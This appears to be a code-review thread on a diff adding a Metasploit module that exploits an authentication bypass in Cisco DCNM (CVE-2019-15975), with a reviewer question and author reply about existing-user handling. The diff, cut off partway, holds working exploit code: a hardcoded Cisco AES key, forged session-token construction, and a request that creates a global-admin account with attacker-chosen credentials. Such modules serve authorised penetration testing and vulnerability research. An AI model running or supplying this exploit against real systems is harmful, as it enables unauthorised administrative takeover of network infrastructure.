modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb

```diff
@@ -0,0 +1,156 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'securerandom'
+require 'base64'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco DCNM auth bypass',
+        'Description' => %q{
+          This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.
+          After that, you can login to the web interface with those credentials.
+          The only necessary condition is the more or less recent connection of an admin as this exploit
+          uses a kind of session stealing.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'MR_ME', # Amazing POC on www.exploit-db.com
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2019-15975']
+          ],
+        'DisclosureDate' => '2020-06-01',
+        'DefaultOptions' => { 'SSL' => true }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('NBRETRIES', [true, 'Maximum number of attempts', 50]),
+      OptString.new('TARGETURI', [true, 'The base path of the Cisco DCNM', '/']),
+      OptString.new('USERNAME', [true, 'The username of the admin account you want to add', 'hacker']),
+      OptString.new('PASSWORD', [true, 'The password of the admin account you want to add', 'Hacked123'])
+    ])
+  end
+
+  class AESCipher
+    def initialize
+      # Cisco's hardcoded key
+      @key = 's91zEQmb305F!90a'
+      @bs = 16
+    end
+
+    def _pad(size)
+      size + (@bs - size.length % @bs).chr.to_s * (@bs - size.length % @bs)
+    end
+
+    def encrypt(raw)
+      raw = _pad(raw)
+      iv = "\x00" * 0x10
+      cipher = OpenSSL::Cipher.new('aes-128-cbc')
+      cipher.encrypt
+      cipher.key = @key
+      cipher.iv = iv
+      Base64.encode64(cipher.update(raw))
+    end
+  end
+
+  def make_raw_token(target)
+    key = 'what_a_nice_key'
+    uuid = SecureRandom.uuid.gsub('-', '')[0..20]
+    time = leak_time(target)
+    raw_token = format('%<key>s-%<uuid>s-%<time>s', key: key, uuid: uuid, time: time)
+    raw_token
+  end
+
+  def bypass_auth(_target, token, usr, pwd)
+    d = {
+      'userName' => usr,
+      'password' => pwd,
+      'roleName' => 'global-admin'
+    }
+    h = { 'afw-token' => token }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'headers' => h,
+      'vars_post' => d,
+      'uri' => normalize_uri(target_uri.path + 'fm/fmrest/dbadmin/addUser')
+    })
+
+    if r.body != 'Access denied'
+
+      begin
+        json = JSON.parse(r.body)
+
+        if json['resultMessage'] == 'Success' || json['resultMessage'] == 'User already exists.'
+          return 0
```

Comment:
If the user already exists, is the password updated? If not then the message later on would be a bit misleading to the user as they try to login with the password they set.

Reply:
You are right, I didn't think about that. If the user already exists, the password won't be updated. So I need to tell it to the user.